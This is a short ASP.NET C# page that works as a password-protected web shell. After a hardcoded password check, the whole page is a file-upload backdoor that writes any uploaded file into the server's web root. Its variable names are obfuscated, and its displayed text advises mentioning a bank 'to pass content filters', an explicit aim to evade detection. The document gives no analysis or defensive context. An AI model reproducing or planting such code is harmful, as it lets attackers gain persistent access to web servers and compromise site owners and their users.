<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
const string p4s = "gatito";
const string pre = "<body style='background-color:black;color:green;'><p>always mention a bank to pass content filters bank, banco :D</p>";
const string then = "</body>";
void Page_Load(object sender, EventArgs e)
    {
      if (Request["psps"] == p4s){          
                if (Request["op"] == "fu")
                {
                    Response.Write(pre);
                    Response.Write(Up());
                    Response.Write(then);
                }
                else{
                    Response.Write(pre);
                    Response.Write(f());
                    Response.Write(then);
                }
       }
    }

string Up()
    {
        try
        {
            
            if (Request.Files.Count != 1)
            {
                return "No f113 selected";
            }

            HttpPostedFile htp = Request.Files[0];
            string cF0ld = Server.MapPath("./");
            FileInfo fin = new FileInfo(htp.FileName);
            string f11nme = Path.Combine(cF0ld, fin.Name);
            int fLength = htp.ContentLength;
            byte[] vuf = new byte[fLength];
            htp.InputStream.Read(vuf, 0, fLength);
             using (FileStream flStream = new FileStream(f11nme, FileMode.Create))
            {
                flStream.Write(vuf, 0, vuf.Length);
            }
            return "F113 arrived!";
        }
        catch (Exception ex)
        {
            return ex.ToString();
        }
    }

string f()
    {
        string t = string.Empty;
        t += "<form enctype='multipart/form-data' action='?psps="+p4s+"&op=fu' method='post'>";
        t += "<br>Please specify a f1l3: <input type=\"file\" name=\"f1l3\"></br>";
        t += "<div><input type=\"submit\" value=\"bank !\"></div>";
        t += "</form>";

        return t;
    }
</script>
